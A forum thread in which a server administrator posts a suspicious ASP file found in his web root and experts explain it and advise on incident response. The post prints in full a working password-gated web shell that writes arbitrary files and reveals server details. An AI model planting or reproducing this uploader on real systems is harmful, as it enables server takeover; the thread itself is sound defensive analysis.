Solved

iis hack - can someone help deciper this text file left on my server ?

Posted on 2013-01-15
7
432 Views
Last Modified: 2013-01-16
I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
test.txt
0
Comment
Question by:drelinger
  • 2
  • 2
  • 2
  • +1
7 Comments
 
LVL 50

Expert Comment

by:Steve Bink
Comment Utility
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The scripts ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
0
 
LVL 22

Expert Comment

by:rickhobbs
Comment Utility
Where was this file located?
0
 
LVL 82

Expert Comment

by:Dave Baldwin
Comment Utility
I agree with @routinet, it is a classic ASP file/program to write files on your server.
0
How to improve team productivity

Quip adds documents, spreadsheets, and tasklists to your Slack experience
- Elevate ideas to Quip docs
- Share Quip docs in Slack
- Get notified of changes to your docs
- Available on iOS/Android/Desktop/Web
- Online/Offline

 

Author Comment

by:drelinger
Comment Utility
file was located in website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file ?
0
 
LVL 50

Accepted Solution

by:
Steve Bink earned 500 total points
Comment Utility
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
0
 
LVL 22

Expert Comment

by:rickhobbs
Comment Utility
Just to be sure, I would also run a reliable anti-spyware product like Malware Antibytes
0
 

Author Closing Comment

by:drelinger
Comment Utility
Great advice. thank you very much.
0

Featured Post

6 Surprising Benefits of Threat Intelligence

All sorts of threat intelligence is available on the web. Intelligence you can learn from, and use to anticipate and prepare for future attacks.

Join & Write a Comment

Suggested Solutions

Title # Comments Views Activity
HTTP error 24 47
VPN Access to company server hostname dns resolve issue. 8 52
Browser authentication 1 61
"Realm" or "Domain" prompt 11 39
Here are the symptoms: You start receiving calls from users that one of your legacy web apps isn't coming up, so you log into your IIS 5 server to check it out.  When you pull up the services, you notice that the WWW Publishing service isn't runn…
Logparser is the smartest tool I have ever used in parsing IIS log files and there are many interesting things I wanted to share with everyone one of the  real-world  scenario from my current project. Let's get started with  scenario - How do w…
Excel styles will make formatting consistent and let you apply and change formatting faster. In this tutorial, you'll learn how to use Excel's built-in styles, how to modify styles, and how to create your own. You'll also learn how to use your custo…
In this seventh video of the Xpdf series, we discuss and demonstrate the PDFfonts utility, which lists all the fonts used in a PDF file. It does this via a command line interface, making it suitable for use in programs, scripts, batch files — any pl…

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

11 Experts available now in Live!

Get 1:1 Help Now